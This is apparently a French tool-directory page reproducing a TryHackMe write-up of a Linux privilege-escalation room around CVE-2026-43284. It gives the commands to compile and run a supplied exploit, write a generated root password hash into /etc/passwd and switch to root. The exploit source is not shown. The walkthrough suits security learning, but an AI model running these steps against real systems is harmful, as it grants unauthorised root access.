Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-43284---DirtyFrag-Analysis-THM- — TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup | Kitploit
Outils/GitHubGitHub/revyhub/cve-2026-43284---dirtyfrag-analysis-thm-
Privilege EscalationVulnerability AnalysisExploitationCTFLearning & EducationLabs & Practice
GitHubrevyhub/cve-2026-43284---dirtyfrag-analysis-thm-

CVE-2026-43284---DirtyFrag-Analysis-THM-

TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 18 joursPas encore vérifié

TryHackMe — CVE-2026-43284: Dirty Frag

Salle : CVE-2026-43284: Dirty Frag Catégorie : Élévation de privilèges Linux Auteur : (Ma page)

Aperçu

Dirty Frag est une room d'élévation de privilèges locale (LPE) Linux enchaînée, construite autour de CVE-2026-43284. L'objectif est de passer d'un shell non privilégié à root en exploitant un exploit de preuve de concept fourni.

Énumération initiale

Lister le répertoire de travail révèle les fichiers fournis pour l'exploit :

root@kitploit:~
$ ls
README.txt
exp
exp.c
  • exp.c — le code source de l'exploit
  • exp — un binaire précompilé (peut ne pas correspondre à l'environnement cible)
  • README.txt — les notes d'utilisation fournies avec l'exploit

Compilation de l'exploit

Le binaire exp fourni n'étant peut-être pas compatible avec l'environnement exact de la cible, il est plus sûr de le reconstruire à partir des sources :

root@kitploit:~
$ gcc -O0 -Wall -o exp exp.c -lutil
  • -O0 désactive les optimisations du compilateur, ce qui rend le comportement prévisible et conforme au code source
  • -Wall active les avertissements du compilateur, utile pour vérifier la compilation
  • -lutil lie libutil — généralement requis lorsque le code utilise des fonctions de pseudo-terminal (pty)

Déclenchement de la vulnérabilité

root@kitploit:~
$ ./exp

L'exécution de l'exploit compilé déclenche la faille sous-jacente, ce qui permet d'obtenir un accès en écriture à un fichier qui devrait normalement être en lecture seule pour les utilisateurs non privilégiés — en l'occurrence /etc/passwd.

Élévation à root

Une fois l'accès en écriture obtenu, un nouveau hash de mot de passe pour root est généré :

root@kitploit:~
$ openssl passwd -1 root
$1$igIXG8so$6K9OaEbAaj.qaknYx9ST..

Ce hash est écrit dans /etc/passwd à la place du champ hash existant de root :

root@kitploit:~
$ nano /etc/passwd

Le mot de passe de root étant maintenant connu, il est simple de changer d'utilisateur :

root@kitploit:~
$ su root

Capture du flag

root@kitploit:~
$ cat /root/flag.txt
THM{REDACTED}

Leçons apprises

  • (Cela a initialement pris plus de 30 minutes pour une compréhension générale, mais une fois que j'ai compris, je pouvais répéter le même exploit plusieurs fois)
  • (Le code interne de root est étrange, on ne peut pas sélectionner et utiliser les contrôles de base ; à la place, on utilise les flèches pour naviguer jusqu'à root❌ et changer X par le hash que l'on a créé)

Mesures d'atténuation

  • Maintenez les paquets noyau/système corrigés et à jour

Ce write-up documente une room TryHackMe terminée à des fins éducatives. L'environnement cible est une machine intentionnellement vulnérable fournie par TryHackMe.

Télécharger l’outil